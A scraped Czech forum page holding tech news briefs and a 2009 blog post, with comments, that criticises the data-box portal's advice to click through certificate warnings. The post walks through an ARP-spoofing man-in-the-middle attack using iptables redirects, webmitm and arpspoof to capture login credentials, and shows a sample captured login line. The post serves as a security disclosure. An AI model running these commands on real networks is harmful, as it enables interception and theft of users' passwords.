IBM kupuje společnost HashiCorp (Terraform, Packer, Vault, Boundary, Consul, Nomad, Waypoint, Vagrant, …) za 6,4 miliardy dolarů, tj. 35 dolarů za akcii.
Byl vydán TrueNAS SCALE 24.04 “Dragonfish”. Přehled novinek této open source storage platformy postavené na Debianu v poznámkách k vydání.
Oznámeny byly nové Raspberry Pi Compute Module 4S. Vedle původní 1 GB varianty jsou nově k dispozici také varianty s 2 GB, 4 GB a 8 GB paměti. Compute Modules 4S mají na rozdíl od Compute Module 4 tvar a velikost Compute Module 3+ a předchozích. Lze tak provést snadný upgrade.
Po roce vývoje od vydání verze 1.24.0 byla vydána nová stabilní verze 1.26.0 webového serveru a reverzní proxy nginx (Wikipedie). Nová verze přináší řadu novinek. Podrobný přehled v souboru CHANGES-1.26.
Byla vydána nová verze 6.2 živé linuxové distribuce Tails (The Amnesic Incognito Live System), jež klade důraz na ochranu soukromí uživatelů a anonymitu. Přehled změn v příslušném seznamu. Tor Browser byl povýšen na verzi 13.0.14.
Byla vydána nová verze 30.0.0 frameworku pro vývoj multiplatformních desktopových aplikací pomocí JavaScriptu, HTML a CSS Electron (Wikipedie, GitHub). Chromium bylo aktualizováno na verzi 124.0.6367.49, V8 na verzi 12.4 a Node.js na verzi 20.11.1. Electron byl původně vyvíjen pro editor Atom pod názvem Atom Shell. Dnes je na Electronu postavena celá řada dalších aplikací.
Byla vydána nová verze 9.0.0 otevřeného emulátoru procesorů a virtualizačního nástroje QEMU (Wikipedie). Přispělo 220 vývojářů. Provedeno bylo více než 2 700 commitů. Přehled úprav a nových vlastností v seznamu změn.
Evropský parlament dnes přijal směrnici týkající se tzv. práva spotřebitele na opravu. Poslanci ji podpořili 584 hlasy (3 bylo proti a 14 se zdrželo hlasování). Směrnice ujasňuje povinnosti výrobců opravovat zboží a motivovat spotřebitele k tomu, aby si výrobky nechávali opravit a prodloužili tak jejich životnost.
Bylo oznámeno (cs) vydání Fedora Linuxu 40. Přehled novinek ve Fedora Workstation 40 a Fedora KDE 40 na stránkách Fedora Magazinu. Současně byl oznámen notebook Slimbook Fedora 2.
ČTK (Česká tisková kancelář) upozorňuje (X), že na jejím zpravodajském webu České noviny byly dnes dopoledne neznámým útočníkem umístěny dva smyšlené texty, které nepocházejí z její produkce. Jde o text s titulkem „BIS zabránila pokusu o atentát na nově zvoleného slovenského prezidenta Petra Pelligriniho“ a o údajné mimořádné prohlášení ministra Lipavského k témuž. Tyto dezinformace byly útočníky zveřejněny i s příslušnými notifikacemi v mobilní aplikaci Českých novin. ČTK ve svém zpravodajském servisu žádnou informaci v tomto znění nevydala.
Volbou přidání certifikátů k důvěryhodným certifikátům či pokračováním na stránku ISDS nevzniká žádné bezpečnostní riziko. Nebo vzniká?
slibovaný návod na arpspoofing v druhé polovině blogpostu
Na datoveschranky.info je hned na první stránce napsáno, že pokud nás při toulkách po portálu zastihne upozornění o neověřitelném certifikátu, máme jej vesele ignorovat a odkliknout. Zajímavé je, že málokoho napadne možné bezpečnostní riziko takového jednání. I sám Pan Ředitel ve včerejší zábavní estrádě prokázal, že má ohledně počítačové bezpečnosti mnohé mezery. A znáte to s tou kovářovic kobylou?
Pojďme si tedy ukázat, co se může stát, když bude uživatel bezhlavě odklikávat OK. Dostat se někomu do datové schránky není zas tak složité...
Cílem článku je především demonstrace, jak snadný může být man-in-the-middle útok. Nemusím doufám upozorňovat, že neručím za žádné problémy vzniklé aplikací zde popisovaných postupů. Nevhodné použití popisovaných programů může vést až k rozpadu vaší sítě, takže si dávejte bacha a zkoušejte si to radši jenom někde, kde to nikomu nevadí. Zneužití cizí DS je pochopitelně trestné.
Neumím efektně stříhat video, takže si to asi Mrkva bude muset natočit sám.
Předpokládám, že tušíte, jak funguje HTTPS a podepisování certifikátů. Také byste měli alespoň zhruba tušit, jak probíhá komunikace v ethernetových sítích a tak...
Nejdřív na svém počítači rozjedeme transparentní proxy, potom přes něj přesměrujeme komunikaci počítače oběti, podvrhneme vlastní certifikát a odposlechneme heslo. Jak prosté, milý Watsone.
Náš počítač je v ethernetové síti realizované switchem, který neumí management portů (většina levnějších switchů), nebo ho nemá nastavený (většina dražších switchů). Takže třeba na koleji na Silicon Hillu to nepůjde. Předpokládám, že na svém počítači máme roota, že známe IP adresu počítače oběti a IP gatewaye. Ze softwaru budeme potřebovat iptables, webmitm a arpspoof z balíku dsniff.
V tomto kroku si vyrobíme vlastní certifikát (self-signed) a budeme poslouchat na portech 80 a 443 a logovat veškeré požadavky, které přes nás půjdou. Dále při pokusu o komunikaci s HTTP serverem s HTTPS stáhneme jeho certifikát, našemu klientovi podstrčíme svůj certifikát a požadavky od klienta vždycky naším soukromým klíčem rozšifrujeme, poznamenáme si je do logu, zašifrujeme "pravým" certifikátem a odešleme.
#zapneme forwarding cizích paketů echo 1 > /proc/sys/net/ipv4/ip_forward #natlačíme do iptablů potřebná pravidla; v tabulce nat ani obecně by neměla být žádná s nimi konfliktní, kdyžtak si napřed celé iptably vyflushujte iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT #spustíme webmitm; začne si generovat certifikát - vyplníme co nejvěrohodněji vypadající údaje webmitm #webmitm ukončíme, zapneme logování požadavků (debug mód) a necháme ho logovat do souboru webmitm -dd 2> soubor
Když se teď připojíme na port 80 nebo 443 počítače, jeho chování by mělo velmi připomínat proxy a v souboru by měly být všechny vyslané požadavky.
Teď potřebujeme, aby zvolená oběť posílala veškerou komunikaci přes nás. Toho dosáhneme jednoduše tím, že na ni začneme křičet, že brána jsme MY. Zároveň začneme křičet na bránu, že MY jsme oběť.
arpspoof -t oběť brána arpspoof -t brána oběť
Když se oběť pokusí spojit s czebox.cz (ano, netestuji to na živé datové schránce), objeví se pochopitelně okýnko (v případě Firefoxu stránka), že jako certifikát hu, které podle instrukcí České pošty odklikne. Až se přihlásí, nám se v logu objeví řádek podobný tomuto:
option=credential&target=https%3A%2F%2Fwww.czebox.cz%2Fportal%2FISDS%2F&Ecom_User_ID=nejakejmeno&Ecom_Password=nejakeheslo&submit.x=89&submit.y=27&submit=Login
(tip: doporučuji pustit na log grep s uživatelským jménem nebo alespoň nějakým jiným dostatečně unikátním řetězcem (submit=Login), log je fakt dlouhý)
No a to je vše...
Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.
Pokud to bude někdo filmovat, dejte sem pak link 
Doporučený titulek pro Blesk a TV Nova: Student se naboural do systému datových schránek!
UPDATE: Pokračování
Tiskni
Sdílej:
3.7.2009 15:55
Jendа | skóre: 78
| blog: Jenda
| JO70FB
3.7.2009 15:53
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Máš pravdu, v .info IDN nefunguje: http://www.datovéschránky.info/
Za phising a blbost uzivatele samozrejme posta nemuze. Ale phishing je nejjednodussi a pokud navic oficialni mista radi ignorovat varovani o neoverenem certifikatu, je to opravdu jednoduche presmerovat uzivatele na nejakou jinou stranku. Je to o hodne jednodussi na rozdil od zminovaneho prikladu s vnucenim obeti nasi GW, a navic univerzalnejsi, kdyz obet nemusi byt v nasi siti. Stejne tak DNS poisoning je o dost slozitejsi, nez jednoduchej phishing.
Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd. Presmerovat nekoho z emailu je opravdu jednoduche a funguje to vsude.
4.7.2009 23:09
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Proste chtelo by to udelat co nejjednodussi ukazku, jinak budou prave ti "profesionalove" jako ve zminenem rozhovoru pouze argumentovat, ze to je slozite, ze to musi byt na stejne siti atd.Jak ukázku? Jako poslat mail (s From: info@datoveschranky.info) a v něm mít odkaz na falešnou stránku? A jak se proti tomu má pošta bránit?
3.7.2009 16:47
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
3.7.2009 17:57
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Nebo se může využít nějaká díra v mailovém klientovy či browseru, skrz kterou jde provést libovolný kód útočníka (a že jich ve Windows bylo - většina záplat řešila právě takové chyby), potom stačí například upravit soubor hosts, takže oběť nepozná, že se připojuje úplně někam jinam.Nebo rovnou nainstalovat keylogger, že. Zase - za děravý browser klienta nemůže pošta.
3.7.2009 15:48
Salamek | skóre: 22
| blog: salamovo
, já bych to udělal ale nechci aby mě pak nějakej debil zabásnul místo toho aby to spravili
3.7.2009 15:51
Jendа | skóre: 78
| blog: Jenda
| JO70FB
3.7.2009 16:16
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
Naimportovat si kořenový certifikát CA PostSignum a nějak si ověřit jeho SHA1sum.Vyžádal jsem si již včera vyjádření PostSignum QCA, jak certifikát bezpečně ověřit. Pokud nedostanu uspokojivou odpověď, podám podnět k ministerstvu vnitra* pro porušení § 6, odst. 1, písm. a) zákona 227/2000 Sb. () Za to lze podle § 18a, odst. 6, uložit pokutu do 10 milionů Kč. Podle certifikační politiky kořenového certifikátu by mělo jít nechat si na "registračních autoritách" (pracovištích ČP) nakopírovat kořenový certifikát na médium. Toto také každému doporučuji, protože je to jediný bezpečný způsob. *Problém je v tom, že Česká pošta s.p. patří pod ministerstvo vnitra. Proto bude MV kontrolovat případné porušení zákona ve své vlastní organizaci, čili nemusí mít zájem na tom, aby se porušení zákona prokázalo.
3.7.2009 16:42
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
Nedostane každý při zřízení oné schránky nějaké papíry? Pak by se SHA1sum mohla otisknout právně v nich, spolu s popisem, jak ověřit, že certifikát není podvrženýByla by to samozřejmě dobrá cesta, ale nedělám si moc velké iluze, že se tam fingerprint dnes uvádí (téměř jistě ne), ani že to tam jen tak sami od sebe začnou uvádět. Kdyžtak je bude potřeba k tomu dokopat (nebo k jiné srovnatelně bezpečné a pohodlné cestě). Nicméně primární by mělo být poskytnutí přes pracoviště ČP, jak je to uvedeno v jejich politice. Jsem zvědav, co mi odpoví (protože by měli odpovědět to, co je v politice uvedeno, případně na ni odkázat). Pak zkusím přijít na poštu (kam stejně musím, protože mi před časem propadl elektronický podpis - zapomněl jsem ho včas prodloužit) a nechat si nakopírovat kořenový certifikát. Doufám, že se nebudou tvářit, že nevědí, co po nich chci. A právě, jak už jsem říkal, ať to zatím takhle dělá každý, protože certifikát získaný přes HTTP může být podvržený.
Hmmm, kdyz jsem sepisoval smlouvu na inet bakovnictvi do KB, tak jsem mel ve smlouve i nejakej checksum - nevim ted, jestli tehdy jeste MD5 nebo uz i SHA1, ale kontroloval jsem to, ale navic KB to ma podepsany verisignem. Mozna to stejnym zpusobem maji i datovyschranky.
Každý dostane u PostSignum společně s certifikátem i kořenové certifikáty na flashku. Tak předpokládám, že je možné je získat i na vyžádání, bez žádosti o vytvoření certifikátu.
3.7.2009 19:21
otasomil | skóre: 39
| blog: puppylinux
A je tu duvod ji rozebirat.
Mj jestli potkavate p Koupeho (osobnosti.cz) tak ho ode mne pozdravujte.
Dekuji
Dostat do prohlížečů další certifikační autoritu je prakticky nemožné, zvlášť pokud se týká jen jednoho státu. Podobně hezké by bylo, kdyby se tam dostala např. CA CESNETu, ale to je také nereálné.
Řešením tedy je, mít bezpečný server s HTTPS certifikátem podepsaným nějakou důvěryhodnou* autoritou a umožnit lidem si z něj stahovat certifikáty českých CA.
*) uznávanou v prohlížečích. A zároveň šířit otisk toho certifikátu i jinou cestou.
3.7.2009 16:47
Michal Wirth | skóre: 26
Navic umi i spoustu dalsich uzitecnych veci.
3.7.2009 18:00
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
3.7.2009 17:55
otasomil | skóre: 39
| blog: puppylinux
K tomu bych si dovolil dodat modifikovanou hlasku z jednoho ceskeho filmu:
Hlavne o tom zvante d******e, at mame na krku IT kriminalku.
3.7.2009 17:58
Jendа | skóre: 78
| blog: Jenda
| JO70FB
3.7.2009 18:41
otasomil | skóre: 39
| blog: puppylinux
Vsak jo. Vase ciny jsou chvalihodne.
Je treba hledat bezpecnostni problemy.
3.7.2009 18:05
Luk | skóre: 47
| blog: Kacířské myšlenky
| Kutná Hora
3.7.2009 18:34
Jendа | skóre: 78
| blog: Jenda
| JO70FB
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
4.7.2009 10:10
Předmět: Zavádějící tvrzení na datoveschranky.info
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dobrý den,
na adrese http://datoveschranky.info/ je uvedeno velmi zavádějící
tvrzení, jehož dodržení může ohrozit bezpečnost uživatele:
"Při pokusu o přihlášení do systému ISDS se může objevit varování,
upozorňující na problém s bezpečnostním certifikátem stránky. Toto je
způsobeno nepřítomností certifikátu ve standardní instalaci MS Windows
či jiných operačních systémů. Upozornění je nutno ignorovat; vstup na
stránku je zcela bezpečný neboť používaný certifikát je vydán
kvalifikovanou českou certifikační autoritou. Volbou přidání
certifikátů k důvěryhodným certifikátům či pokračováním na stránku
ISDS nevzniká žádné bezpečnostní riziko."
Pokud se uživatel bude těmito instrukcemi řídit, nainstaluje si
certifikát, u kterého nemůže ověřit, jestli ho opravdu vydalo
PostSignum nebo ho podvrhl útočník. Vhodnější by bylo, pokud byste
uvedli, jak si naimportovat kořenový certifikát PostSigna a ověřit
jeho integritu.
Děkuji za vyjádření,
Jan Hrach
- --
Jan Hrach
Mail: jenda {} hrach.eu
Jabber: hrachj {} abclinuxu.cz
GPG: http://ftp.hrach.eu/jenda/public.key
1D9D AC4B E964 0D1E 7F5D 6E03 B72F 6430 9FA4 F536
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iEYEARECAAYFAkpOMj8ACgkQty9kMJ+k9TawnQCg7apv2DFC8SW+UpS6+OXPJ/mG
w6kAniPI+lyxSOYDQSCRsrbHyft9BIjW
=J1UN
-----END PGP SIGNATURE-----
3.7.2009 18:45
otasomil | skóre: 39
| blog: puppylinux
Tak to se tu za vsechny tesim na odpoved. Ani bych se nedivil kdyby neodpovedeli - k tomu mailu totiz neni co dodat.
3.7.2009 23:31
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
3.7.2009 23:33
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
4.7.2009 08:57
belisarivs | skóre: 22
| blog: Psychobláboly
Mozna je to blba otazka, ale nestoji pokus o napadeni timto zpusobem na nutnosti byt s napadenym ve stejne siti a to jeste na hubu, ktery posila data vsem a ty pak jdou zachytit treba wiresharkem, ktery prepne sitovku do promiskuitniho rezimu?
Cili, pokud jsem priojen do switche, ktery neposila vse vsem, ale jenom tomu, komu ma, tak jsem za vodou?
4.7.2009 12:23
thingie | skóre: 8
4.7.2009 12:58
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
4.7.2009 13:17
vlastikroot | skóre: 24
| blog: vlastikovo
| Milevsko
4.7.2009 13:37
Jendа | skóre: 78
| blog: Jenda
| JO70FB
4.7.2009 13:47
vlastikroot | skóre: 24
| blog: vlastikovo
| Milevsko
Když jsem jednou dočasně musel zobrazovat uživatelům prohlížečů postavených na Gecku upozornění na nefunkčnost WYSIWYG editace HTML, detekoval jsem "Gecko/1.8.blablabla" (už nevím, od které verze přesně to bylo), ale v upozornění jsem bez skrupulí použil slovo Firefox. Koho zajímá jakési Gecko a proč mluvit o jakési Mozille – technici vědí a u netechniků nějaká jiná Gecko-aplikace prakticky nehrozí.
4.7.2009 13:59
thingie | skóre: 8
Prosím tě, kde žiješ? Copak nevíš, co o tom kážou odborníci na prohlížeče?
One of the most common operations performed in a Web page is to detect the browser type and version.
4.7.2009 14:39
thingie | skóre: 8
HTTP je stejně víc zvykové právo, než nějaký přesně specifikovaný protokolOpravdu HTTP? Nenapadá mne nic, co by se dnes masově při HTTP komunikaci používalo, a bylo to v rozporu se specifikací HTTP nebo v ní nebylo uvedeno.
Nicméně pokud se odpověď výrazně liší podle user-agent v hlavičce, tak je to prostě problém, a dít by se to nemělo.Specifikace protokolu HTTP na to má jiný názor a dokonce specifikuje hlavičku
Vary, na základě které se určí, které hlavičky HTTP dotazu ovlivňují výběr odpovědi.
4.7.2009 16:38
thingie | skóre: 8
4.7.2009 16:43
David Watzke | skóre: 74
| blog: Blog...
| Praha
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5
4.7.2009 20:45
vlastikroot | skóre: 24
| blog: vlastikovo
| Milevsko
4.7.2009 21:00
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
Za to ze si nekdo vubec dovoli davat detekci podle user agentu a ostatnim znemoznit funkcnost, by mel prijit o svoje pracovni misto. Varovani beru, ale naprosty znefunkcneni stranky kvuli jiny identifikaci browseru je fakt silny kafe.Samotná Mozilla na tom nebyla o moc lépe.
4.7.2009 23:34
vlastikroot | skóre: 24
| blog: vlastikovo
| Milevsko
5.7.2009 10:37
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
5.7.2009 12:16
Salamek | skóre: 22
| blog: salamovo
5.7.2009 12:42
vlastikroot | skóre: 24
| blog: vlastikovo
| Milevsko
vzdycky mas lepsi pravdu nez ja
5.7.2009 09:14
stativ | skóre: 54
| blog: SlaNé roury
4.7.2009 19:45
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Omluvte plánovanou odstávku informačního systému datových schránek od 4. 7. do 5. 7.Muhehe, čtyři dny to jelo a už si naplánovali odstávku
4.7.2009 19:47
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Omlouváme se všem uživatelům Datových schránek, v současné době probíhá plánovaná odstávka, z důvodů prací spojených s náběhem systému. Práce se týkají implementace změn v systému Datových schránek, které vyplývají z Novely zákona 300/2008 Sb. Probíhá rovněž plánované zátěžové testování systému a činnosti, které souvisí s další etapou bezpečnostního auditu systému Datových schránek.Že by se ledy hnuly?
4.7.2009 20:34
Grunt | skóre: 23
| blog: Expresivní zabručení
| Lanžhot
4.7.2009 20:36
Jendа | skóre: 78
| blog: Jenda
| JO70FB
6.7.2009 14:49
Jendа | skóre: 78
| blog: Jenda
| JO70FB
5.7.2009 02:51
Salamek | skóre: 22
| blog: salamovo
5.7.2009 02:55
Salamek | skóre: 22
| blog: salamovo
Jenže „maximální snaha“ neříká nic o tom, zda se výsledku podařilo dosáhnout – píše-li to luser, ani maximální snažení nebude korunováno XHTML validitou
Ad BFW – existuje i něco jako BFU Friendly Web?
5.7.2009 12:28
Jendа | skóre: 78
| blog: Jenda
| JO70FB
.
5.7.2009 13:20
Salamek | skóre: 22
| blog: salamovo
